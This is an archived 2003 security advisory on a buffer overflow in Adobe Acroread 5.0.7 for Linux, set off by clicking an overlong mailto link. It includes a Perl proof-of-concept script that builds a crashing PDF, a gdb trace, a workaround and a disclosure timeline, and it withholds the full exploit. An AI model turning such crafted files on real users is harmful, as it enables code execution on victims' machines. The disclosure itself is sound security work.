I. BACKGROUND Acroread from http://www.adobe.com is the pre-eminent PDF file viewer. The latest version Acroread 5.0.7 for Linux was released on 17 June 2003. II. DESCRIPTION Despite recent security fixes, an exploitable buffer overflow with long URL strings remains. The overflow occurs when you click on the link, and allows execution of arbitrary code. Acroread versions 5.0.7 and 5.0.5 were tested on Debian (woody) Linux; other acroread 5.* versions on other UNIX platforms are expected also to be vulnerable. (Configure Netscape as your browser, and do not have Netscape running at the time you click.) III. ANALYSIS Produce a suitable test file using pdflatex e.g. with: #!/usr/bin/perl -- # # Demo for acroread 5.0.7 on Debian Linux # print ' Writing TeX file ... '; # For acroread 5.0.5 use 248 Bs instead of 504 open P, '>attack.tex'; print P ' \documentclass[11pt]{letter} \usepackage{times} \usepackage[pdfpagemode=none,pdfstartview=FitH]{hyperref} \begin{document} \href{mailto:X',("B"x504).("A"x4),'} {\texttt{mailto:X("B"x504).("A"x4)}} \end{document} '; close P; # print ' Running pdflatex ... '; system 'pdflatex attack'; # #!# Acroread has a signal handler and may not crash when the link is clicked, but gdb shows: (gdb) run attack.pdf Starting program: /Acroread507/Reader/intellinux/bin/acroread attack.pdf Program received signal SIGSEGV, Segmentation fault. (gdb) where #0 0x40f50513 in mdNetscapeFront () from /Acroread507/Reader/intellinux/plug_ins/wwwlink.api Cannot access memory at address 0x41414141 IV. WORKAROUND Remove the file .../Reader/*/plug_ins/wwwlink.api . V. EXPLOIT Censored. Fully working exploit sent to CERT. VI. COMMENTS Acroread 5.0.7 for Linux was released on 17 June 2003, and the README file contains: New for Acrobat Reader 5.0.7 A security patch was applied that solves the problem reported in CERT vulnerability 200132 whereby a weblink could execute shell commands. Acroread still uses 'sh -c' via system(3) but disallows embedded single quotes and replaces dollar($) and backquote(`) by %24 and %60 in the URL, then quotes the URL with single quotes like sh -c DISPLAY=DISPL BROWSER 'URL' Seems that when given the example exploit, in a knee-jerk reaction Adobe encoded the "special" characters used. When told that the "shell meta-character soup" was larger, they quoted the URL and, seeing how encoding did not work, courageously banned embedded quotes; were too lazy to remove the encoding. Should have replaced system(3) with fork/setenv/execv instead. The lengthening of the URL string prompted me to check how acroread handles long replacements; but even "plain" long strings cause it to fail. The 5.0.7 README file also contains: New for Acrobat Reader 5.0.6 A security patch was applied that solves the problem reported in http://online.securityfocus.com/archive/1/278984 where opening the font cache when the application starts up can unintentionally cause the permissions of other files to change. and confirm that this is solved in 5.0.7. The changes from 5.0.5 to 5.0.7 are in libCoolType.so, EScript.api and wwwlink.api only, so acroread 5.0.7 still announces itself, on the splash screen and in Help AboutAcrobatReader, as 5.0.5. CoolType was for 5.0.6, wwwlink for 5.0.7; is EScript for http://www.kb.cert.org/vuls/id/184820 though that was meant to affect "full" acrobat only? Acroread versions 4.* do not seem vulnerable to the buffer overflow, they chop the URL string after 1025 (!!??) bytes; but are vulnerable to the "shell meta-character soup" (could be protected with the workaround below). VII. TIMELINE 13 Jun 2003 -10day advisory released 17 Jun 2003 Acroread 5.0.7 for Linux released 23 Jun 2003 iDefense and CERT alerted to buffer overflow 26 Jun 2003 Fully working exploit sent to iDefense 1 Jul 2003 team@sec-labs.hack.pl finds same vulnerability 9 Jul 2003 iDefense does not offer payment VIII. REFERENCES CERT vulnerability note http://www.kb.cert.org/vuls/id/200132 -10Day CERT Advisory on PDF Files (note that the workaround in the latter message does not protect against the buffer overflow) http://lists.netsys.com/pipermail/full-disclosure/2003-June/010397.html http://lists.netsys.com/pipermail/full-disclosure/2003-June/010417.html Adobe Acrobat Reader <=5.0.7 Buffer Overflow Vulnerability + PoC code (public report of the same vulnerability) http://www.securityfocus.com/archive/1/327335 http://www.securityfocus.com/archive/1/328472 IX. AUTHOR Paul Szabo - pszat_private http://www.maths.usyd.edu.au:8000/u/psz/ School of Mathematics and Statistics University of Sydney 2006 Australia
This archive was generated by hypermail 2b30 : Thu Jul 10 2003 - 10:29:53 PDT